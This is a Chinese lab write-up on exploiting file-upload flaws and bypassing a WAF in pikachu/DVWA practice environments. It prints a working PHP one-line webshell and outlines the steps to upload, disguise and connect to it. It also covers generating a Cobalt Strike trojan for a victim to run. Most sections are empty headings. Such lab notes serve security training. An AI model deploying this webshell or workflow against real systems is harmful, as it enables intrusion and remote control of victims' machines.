文件上传WAF绕过实战:一句话木马编写、webshell连接与CS木马攻击

一句话木马的编写

<?php @eval($_POST['cmd']);phpinfo();?>

webshell的连接工具

如何连接webshell

第一步:上传木马文件到目标服务器中

第二步:需要访问木马

第三步:连接木马文件

第四步:shell管理

实验测试

2003的导入虚拟机

写木马文件

访问木马

连接木马

哥斯拉的使用

ladon扫描器

文件上传

http://172.20.69.110/pikachu/
http://172.20.69.110/dvwa/login.php
http://172.20.69.110/sqlit/
http://172.20.69.110/
http://172.20.69.110/phpmyadmin/
http://172.20.69.110/ekucms2.5/

第一步:确定目标地址

http://172.20.69.99:89/pikachu-master/pikachu-master/vul/unsafeupload/servercheck.php

第二步:尝试上传文件

http://172.20.69.99:89/pikachu-master/pikachu-master/vul/unsafeupload/uploads/shell.jpg

第三步:抓取上传数据包

第四步:更改数据包

第五步:访问目标

第六步:shell连接

CS的工具

工具下载

启动工具

第一步:打开cs的客户端

第二步:部署服务器端

任务:打开cs.bat

cs木马生成

第一步:设置监听器

第二步:设置cs马

第三步:让被攻击者运行此文件,受害主机上线(双击)

第四步:使用插件增强

实验心得与总结

本次实验主要学习了文件上传漏洞的利用,包括一句话木马的编写和连接,以及使用哥斯拉和Ladon进行扫描和利用CS木马进行攻击。在实验中,我们学习了如何通过抓包并修改数据包来绕过WAF的检测,同时也需要注意目标系统的防御措施,例如上传类型的限制等。连接木马时,需要使用webshell连接工具进行连接和管理。

同时,本次实验还学习了CS木马的生成和使用,需要设置监听器和CS马,并让被攻击者运行此文件,受害主机上线。可以使用插件增强CS木马的功能,实现更多的攻击和控制操作。

总的来说,本次实验对于提高网络安全意识和技能有很大的帮助,通过实践操作,深入理解了文件上传漏洞和木马攻击的原理和方法。在实际工作和学习中,需要不断学习和研究最新的安全技术和攻击手段,以提高系统的安全性。

文件上传WAF绕过实战:一句话木马编写、webshell连接与CS木马攻击

原文地址: https://www.cveoy.top/t/topic/oYdM 著作权归作者所有。请勿转载和采集!

免费AI点我,无需注册和登录